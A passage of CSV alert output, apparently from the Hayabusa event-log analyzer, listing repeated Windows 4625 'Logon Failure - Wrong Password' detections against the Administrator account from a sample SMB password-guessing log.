NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.937 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.162 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.214 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.425 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.470 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.526 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.565 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.651 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.699 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.106 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.258 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.355 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.458 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.725 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.806 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.886 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.089 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.186 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.305 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.721 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.758 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.802 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.890 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.025 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.115 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.155 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.335 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.438 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 